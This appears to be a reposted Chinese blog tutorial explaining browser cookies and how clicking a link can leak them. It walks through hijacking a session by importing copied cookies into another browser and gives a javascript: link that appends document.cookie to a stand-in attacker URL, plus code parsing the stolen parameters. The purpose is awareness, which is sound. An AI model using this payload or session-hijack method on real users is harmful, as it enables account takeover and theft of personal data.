点了下链接信息就泄露了,ta们是怎么做到的?

这篇具有很好参考价值的文章主要介绍了点了下链接信息就泄露了,ta们是怎么做到的?。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

点了下链接信息就泄露了,ta们是怎么做到的?

随着互联网的普及以及一系列可供上网设备的快速发展,截止2022年12月,中国网民规模达10.37亿,较之2021年12月增长3549万,互联网普及率达75.6%;在这么庞大的数据背后又有多少用户的个人信息被泄露呢?

一、信息泄露常见场景

1.1 手机号码泄露导致的骚扰短信或电话

点了下链接信息就泄露了,ta们是怎么做到的?

1.2 不同的平台账号被盗后用于群发非法信息

点了下链接信息就泄露了,ta们是怎么做到的?点了下链接信息就泄露了,ta们是怎么做到的?点了下链接信息就泄露了,ta们是怎么做到的?

备注:图源网络

二、cookie

2.1 什么是cookie

在介绍之前,我们首先需要了解什么是cookie,类型为“小型文本文件”,是某些网站为了辨别用户身份,进行Session跟踪而储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。
举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。如果使用浏览器访问 Web, 会看到所有保存在硬盘上的 Cookie。
在这个文件夹里每一个文件都是一个由“名/值”对组成的文本文件,另外还有一个文件保存有所有对应的 Web 站点的信息。在这里的每个 Cookie 文件都是一个简单而又普通的文本文件。透过文件名, 就可以看到是哪个 Web 站点在机器上放置了Cookie(当然站点信息在文件里也有保存) 。
所谓“cookie”数据是指某些网站为了辨别用户身份,储存在用户本地终端上的数据(通常经过加密),由用户客户端计算机暂时或永久保存的信息。
通俗来讲就是指缓存数据,包括用户名、密码、注册账户、手机号等公民个人信息。
介绍源自百科

点了下链接信息就泄露了,ta们是怎么做到的?

2.2 登录及访问网站的流程

我们在接下来的流程演示中以百度为例。
场景如下:我昨天用百度APP浏览了一些我很感兴趣的内容,今天我在电脑上想再看一下,但是我并没有将那些网址记下来,
(想必大家上网冲浪的时候也没有背诵网址的习惯吧) 那只能在这个新的终端通过登录并查看历史浏览记录才能达到这一效果了。

点了下链接信息就泄露了,ta们是怎么做到的?

在谷歌浏览器访问百度发现处于未登录的状态,输入账号密码并点击登录,校验信息成功后会返回cookie并跳转或刷新页面。如下图即为登录流程以及成功后的页面显示

点了下链接信息就泄露了,ta们是怎么做到的?
点了下链接信息就泄露了,ta们是怎么做到的?

那么如何查看cookie呢?
在浏览器右击点击检查
点击上方的Application选项卡
点击左侧的Cookies栏目,即可查看浏览器的cookie信息
现在可以看到有百度的cookie的信息,它是通过不同的网站进行分类,Name列与Value列是类似于键值对的关系进行组合

点了下链接信息就泄露了,ta们是怎么做到的?

cookie也看到了,那我现在想要访问一下我的个人中心,需要跳转页面才能实现,那这个过程是不是还需要再次登录呢?

点了下链接信息就泄露了,ta们是怎么做到的?

很显然是不用的,这是因为服务器有检测到这个有效cookie,所以后续一系列的访问都会放行让我们顺利通关。
那么可想而知,这个信息如果被别人掌握了,是不是就意味着他们能冒充我们的身份呢?
大腿一拍:“坏了! 我成替身了!!”

点了下链接信息就泄露了,ta们是怎么做到的?
点了下链接信息就泄露了,ta们是怎么做到的?

点了下链接信息就泄露了,ta们是怎么做到的?

2.3 如何跨浏览器使用cookie

市面上有着丰富的浏览器供用户选择使用,如:谷歌、火狐、Edge、等,但是不同的浏览器之间进行cookie的读取显然是不可行的,很简单的一个例子,现在我在百度登录了我的账号,那么我在火狐浏览器访问百度很明显是处于未登录的状态,因为不同的浏览器的cookie就是给各自的浏览器使用的

点了下链接信息就泄露了,ta们是怎么做到的?

假设啊,这里我只是假设,假设你的对象截取到了你在谷歌浏览器的cookie并通过别的浏览器登录你的账号,ta该如何操作呢?
首先,ta在火狐浏览器鼠标右键点击检查,点击存储,点击cookie,在下方点击全部删除,将现有cookie清空

点了下链接信息就泄露了,ta们是怎么做到的?

然后ta打开了你的谷歌浏览器右键检查,点击Application,点击cookie,将百度服务器返回给你cookie信息一条条复制过去;
当然也可以借助浏览器插件(cookie-editor)批量导出,放到文本编辑器中可以看到就是这种JSON格式的数据

点了下链接信息就泄露了,ta们是怎么做到的?点了下链接信息就泄露了,ta们是怎么做到的?

在火狐浏览器同样安装这个插件,将数据复制过来,点击导入,然后刷新页面,可以看到在火狐浏览器没有进行什么账号密码的校验也登录成功了,那是不是意味着ta想干什么都可以呢

点了下链接信息就泄露了,ta们是怎么做到的?

点了下链接信息就泄露了,ta们是怎么做到的?

三、信息是如何泄露的?

3.1 点击不明链接

这时候大家可能就会说了,我没有对象,没人来截取我的cookie。大话不要说太早,我们首先新建一个html文件,在里面放上一个a标签并写上一些很有诱惑力的语句,这样看上去是不是就很想点一下呢?

点了下链接信息就泄露了,ta们是怎么做到的?

<a href="">猜你喜欢,点我有惊喜</a>

3.1 通过JS获取cookie

我们先通过手动插入的方式给这个网址加入一些cookie,右击检查,选择Application、Cookies,在右侧双击即可添加cookie

点了下链接信息就泄露了,ta们是怎么做到的?

随后点击Console选项卡,输入document.cookie,即可输出该网站的所有cookie信息

点了下链接信息就泄露了,ta们是怎么做到的?

document.cookie

这时候我们再对上面的超链接修饰一下,跳转到别有用心的人部署的网站,并通过拼接地址栏参数的形式将cookie携带出去

点了下链接信息就泄露了,ta们是怎么做到的?

<a href="javascript:location.href='http://www.baidu.com?'+document.cookie">猜你喜欢,点我有惊喜</a>

3.2 从地址栏获取参数并进行截取

点击该超链接,可以在地址栏看到刚才我们在那个网址所添加的cookie信息都以参数的形式携带过来了

点了下链接信息就泄露了,ta们是怎么做到的?

现在我们已经携带着自己的信息跳转到了别有用心的人的网站,ta如何通过JS获取地址栏参数呢

function  GetQueryString(name)
{
      var  reg = new  RegExp( "(^|&)" + name + "=([^&]*)(&|$)" );
      var  r = window.location.search.substr(1).match(reg);
      if (r!= null ) return   unescape(r[2]); return  null ;
}
// 调用方法
alert(GetQueryString( "参数名1" ));

到了这一步可以说是已经无法挽回了,这也是你时常会收到骚扰电话、短信、盗号提醒的原因之一,希望大家在网上冲浪的时候守护好自己的个人信息文章来源地址https://www.toymoban.com/news/detail-427610.html

到了这里,关于点了下链接信息就泄露了,ta们是怎么做到的?的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 高防CDN是怎么做到阻止网络攻击的

    什么是高防CDN CDN是什么?CDN是在现有 Internet 中增加的一层新的网络架构,由遍布全国的高性能加速节点构成。这些高性能的服务节点都会按照一定的缓存策略存储您的业务内容,当您的用户向您的某一业务内容发起请求时,请求会被调度至最接近用户的服务节点,直接由服

    2024年02月13日
    浏览(50)
  • 【Python小技巧】使用必杀技一键安装Ta-lib(其它第三方库装不上的也可以参考,链接下载不了可通过文中CSDN资源下载)

    最近升级了电脑系统,换了个nvme的ssd,系统装了win11。界面很清爽,心情不错。安装了最新版本的Anaconda,Python也更新到3.10版本,环境都配置好了,但新装系统后,很多都需要重新配置。由于频繁需要使用到股票行情的指标计算,Ta-lib是必不可少的。但没想到安装依旧报错。

    2024年02月07日
    浏览(118)
  • Excel部分单元格不能编辑,什么原因?怎么做到的?

    Excel文件打开之后,发现在一个工作表中,有些单元格点击之后没有反应,有些就是正常的。大家可能不知道是什么原因,这个是设置了工作表保护的原因。 大家可能会想,工作表保护是对整个工作表的保护,应该不是保护一部分单元格的吧,其实是可以的。今天和大家分享

    2024年02月02日
    浏览(42)
  • CTFHub-Web-信息泄露-Git泄露

    目录 一、Log 1、题目介绍 2、知识储备 3、解题步骤 (1)、查看页面 (2)、dirsearch扫描目录 (3)、Githack扫描  (4)、git log历史查询 (5)、获取flag 二、Stash 1、知识储备: 2、githack扫描 3、获取flag  三、Index 1、知识储备 2、dirsearch扫描 3、获取flag  四、个人感悟 (1)、

    2024年02月12日
    浏览(32)
  • ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解决办法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031) 漏洞解决办法            

    2024年02月12日
    浏览(47)
  • Flink中KeyedStateStore实现--怎么做到一个Key对应一个State

    在Flink中有两种基本的状态: Keyed State和Operator State , Operator State 很好理解,一个特定的Operator算子共享同一个state,这是实现层面很好做到的。 但是 Keyed State 是怎么实现的?一般来说,正常的人第一眼就会想到:一个task绑定一个 Keyd State ,从网上随便查找资料就能发现正确的

    2024年02月10日
    浏览(32)
  • 月薪过 3w 的 软件测试工程师 都是怎么做到的?

    对任何职业而言,薪资始终都会是众多追求的重要部分。前几年的软件测试行业还是一个风口,随着不断地转行人员以及毕业的大学生疯狂地涌入软件测试行业,目前软件测试行业“缺口”已经基本饱和。 当然,我说的是最基础的功能测试的岗位需求已经很少了,而自动化、

    2023年04月19日
    浏览(63)
  • 三次输错密码后,系统是怎么做到不让我继续尝试的?

    忘记密码这件事,相信绝大多数人都遇到过,输一次错一次,错到几次以上,就不允许你继续尝试了。 但当你尝试重置密码,又发现新密码不能和原密码重复: 相信此刻心情只能用一张图形容: 虽然,但是,密码还是很重要的,顺便我有了一个问题:三次输错密码后,系统

    2024年02月04日
    浏览(29)
  • 三、敏感信息泄露漏洞

    一、漏洞简述 二、数据类型 三、信息分类 1、系统敏感信息泄露 2、个人敏感信息泄露 四、修复建议

    2024年02月16日
    浏览(62)
  • Web应用安全—信息泄露

            从书本和网上了解到Web应用安全的信息泄露的知识,今天跟大家分享点。  robots.txt泄漏敏感信息         漏洞描述:搜索引擎可以通过robots文件可以获知哪些页面可以爬取,哪些页面不可以爬取。Robots协议是网站国际互联网界通行的道德规范,其目的是保护网

    2024年02月03日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包